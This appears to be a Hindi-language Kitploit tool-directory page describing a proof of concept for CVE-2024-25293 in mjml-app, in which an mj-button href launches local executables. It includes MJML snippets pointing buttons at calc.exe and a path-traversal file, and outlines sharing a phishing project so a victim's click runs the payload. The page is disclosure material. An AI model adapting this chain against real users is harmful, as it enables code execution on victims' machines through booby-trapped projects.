Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-25293 — mjml-app v3.0.4 और 3.1.0-beta RCE एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/eqstlab/cve-2024-25293
फ़िशिंग उपकरणपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणगलत कॉन्फ़िगरेशन
GitHubeqstlab/cve-2024-25293

CVE-2024-25293

mjml-app v3.0.4 और 3.1.0-beta RCE एक्सप्लॉइट

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

MJML स्थानीय कोड निष्पादन PoC

CVE-2024-25293 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट।

mjml-app v3.0.4 और 3.1.0-beta में रिमोट कोड एक्ज़िक्यूशन (RCE) पाया गया। इस रिपॉजिटरी में एक उदाहरण भेद्य एप्लिकेशन और उसका प्रूफ-ऑफ-कॉन्सेप्ट (POC) शोषण मौजूद है।

एक PoC के रूप में एक पायथन फ़ाइल है जो प्रक्रिया को स्वचालित करती है।

1. भेद्यता अवलोकन:

  • भेद्यता विषय: स्थानीय कोड निष्पादन
  • भेद्यता संस्करण: mjml-app 3.0.4-win और mjml-app 3.1.0-beta
  • हमले का प्रकार: रिमोट कोड एक्ज़िक्यूशन
  • हमले का घटक: प्रभावित सोर्स कोड फ़ाइल में 'mj-button' टैग के भीतर, 'href' विशेषता स्थानीय कोड निष्पादन को सक्षम बनाती है।
  • आरक्षित CVE संख्या: CVE-2024-25293

2. भेद्यता का कारण:

  • mjml-app 3.0.4-win और mjml-app 3.1.0 beta 'mj-button' टैग में सुरक्षा गलत कॉन्फ़िगरेशन से ग्रस्त है, जिसके परिणामस्वरूप मनमाना कोड निष्पादन हो सकता है।
  • शोषण का स्पष्टीकरण
    • mjml अनुप्रयोगों में इवेंट टैग के माध्यम से लोकल फ़ाइलें चलाना एक सुरक्षा खतरा पैदा करता है। इसके अलावा, एप्लिकेशन के भीतर Path Traversal को जोड़कर कोड निष्पादित किया जा सकता है, जिसके लिए पैच की आवश्यकता होती है। image

प्रूफ-ऑफ-कॉन्सेप्ट (POC)

चरण 1) हमलावर एक 'href' टैग के साथ एक 'mj-button' बनाता है और

  • केस 1) Path Traversal के साथ कोड निष्पादन (notepad.exe)
  • केस 2) कोड निष्पादन (calc.exe)
root@kitploit:~
<mjml>
  <mj-body>
    <mj-section>
      <mj-column>
        <mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
        <mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>
      </mj-column>
    </mj-section>
  </mj-body>
</mjml>

mjml1

चरण 2) हमलावर निम्नलिखित कोड के साथ मुख्य फ़िशिंग प्रोजेक्ट बनाता है।

root@kitploit:~
<!-- header.mjml -->
<mj-section>
  <mj-column>
    <mj-text>This is a demo jruru</mj-text>
  </mj-column>
</mj-section>
<!-- main.mjml -->
<mj-include path="./index.mjml" />

mjml2

चरण 3) पीड़ित साझा प्रोजेक्ट खोलता है और बटन पर क्लिक करता है, जिससे पेलोड का निष्पादन ट्रिगर होता है (जैसे calc, notepad) mjml3


3. अतिरिक्त जानकारी

किसी एप्लिकेशन के भीतर href टैग के माध्यम से exe फ़ाइलें चलाना जोखिम भरा है, और Path Traversal के साथ संयोजन में फ़ाइलें चलाना एक सुरक्षा चिंता है। यह फ़िशिंग प्रोजेक्ट बनाने और उन्हें तैनात करने की अनुमति देता है ताकि लोकल फ़ाइलें निष्पादित की जा सकें। इसलिए, ऐसे निष्पादन को रोकने के लिए इस सुविधा को संशोधित करना आवश्यक है।

टूल डाउनलोड करें